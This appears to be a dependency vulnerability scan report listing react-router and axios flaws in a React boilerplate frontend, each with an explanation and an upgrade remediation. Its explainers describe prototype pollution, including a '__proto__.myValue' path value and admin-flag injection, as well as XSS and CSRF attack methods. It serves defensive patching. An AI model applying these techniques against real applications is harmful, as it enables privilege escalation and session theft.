  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate react-router@7.9.6
    Remediation: Upgrade to react-router@7.12.0.

Overview

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) due to the improper origin checks of UI route submissions in server-side route action handlers in Framework Mode. An attacker can execute unauthorized actions by tricking a user into submitting a crafted POST request to a UI route.

Note:

This issue does not impact applications using Declarative Mode <BrowserRouter> or Data Mode createBrowserRouter/<RouterProvider>.

Remediation

Upgrade react-router to version 7.12.0 or higher.

References

Cross-site Request Forgery (CSRF) vulnerability report

medium severity
new

Improper Encoding or Escaping of Output

  • Vulnerable module: axios
  • Introduced through: axios@1.12.2

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate axios@1.12.2
    Remediation: Upgrade to axios@1.15.1.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Improper Encoding or Escaping of Output through the encode function in AxiosURLSearchParams. An attacker can smuggle a NUL byte into serialized query strings by supplying crafted parameter values, causing downstream parsers or backend components to misinterpret the request and potentially truncate or alter parameter handling.

Notes: Standard axios request flow (buildURL) uses its own encode function, which does NOT have this bug. Only triggered via direct AxiosURLSearchParams.toString() without an encoder, or via custom paramsSerializer delegation

Remediation

Upgrade axios to version 0.31.1, 1.15.1 or higher.

References

Improper Encoding or Escaping of Output vulnerability report

medium severity
new

Prototype Pollution

  • Vulnerable module: axios
  • Introduced through: axios@1.12.2

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate axios@1.12.2
    Remediation: Upgrade to axios@1.15.1.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Prototype Pollution via the mergeDirectKeys function in mergeConfig. An attacker can force a request configuration to inherit attacker-controlled properties by supplying a polluted Object.prototype, causing Axios to read inherited values, such as validateStatus, during config merging. This lets a malicious page or library alter how responses are handled, including making 4xx and 5xx responses be treated as successful and bypassing normal error handling in applications that rely on Axios defaults.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade axios to version 0.31.1, 1.15.1 or higher.

References

Prototype Pollution vulnerability report

medium severity
new

Unintended Proxy or Intermediary ('Confused Deputy')

  • Vulnerable module: axios
  • Introduced through: axios@1.12.2

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate axios@1.12.2
    Remediation: Upgrade to axios@1.15.0.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Unintended Proxy or Intermediary ('Confused Deputy') via improper hostname normalization in the NO_PROXY environment variable. An attacker controlling request URLs can access internal or loopback services by crafting requests (with a trailing dot or [::1]) that bypass proxy restrictions, causing sensitive requests to be routed through an unintended proxy.

Note:

This is only exploitable if the application relies on NO_PROXY=localhost,127.0.0.1,::1 for protecting loopback/internal access.

Remediation

Upgrade axios to version 0.31.0, 1.15.0 or higher.

References

Unintended Proxy or Intermediary ('Confused Deputy') vulnerability report

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: react-router
  • Introduced through: react-router@7.9.6

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate react-router@7.9.6
    Remediation: Upgrade to react-router@7.12.0.

Overview

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the ScrollRestoration API when using the getKey or storageKey props during server-side rendering in Framework Mode. An attacker can execute arbitrary JavaScript code by supplying untrusted content to generate the keys. This is only exploitable if server-side rendering is enabled in Framework Mode and untrusted input is used for key generation.

Note:

This issue does not impact applications using Declarative Mode <BrowserRouter> or Data Mode createBrowserRouter/<RouterProvider> and server-side rendering in Framework Mode is disabled.

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade react-router to version 7.12.0 or higher.

References

Cross-site Scripting (XSS) vulnerability report

medium severity
new

Insertion of Sensitive Information Into Sent Data

  • Vulnerable module: axios
  • Introduced through: axios@1.12.2

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate axios@1.12.2
    Remediation: Upgrade to axios@1.15.1.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data through the request configuration handling in the adapters/xhr.js adapter and helpers/resolveConfig.js‎. An attacker can force the withXSRFToken option to a truthy non-boolean value, or pollute Object.prototype.withXSRFToken, by supplying a crafted request config that causes the XSRF header to be sent on cross-origin requests. When withXSRFToken is treated as a generic truthy value, the same-origin check is bypassed, and the browser reads the XSRF cookie and attaches it to an attacker-controlled destination. This exposes the user's XSRF token to a cross-origin endpoint, potentially enabling request forgery against the victim's authenticated session.

Remediation

Upgrade axios to version 0.31.1, 1.15.1 or higher.

References

Insertion of Sensitive Information Into Sent Data vulnerability report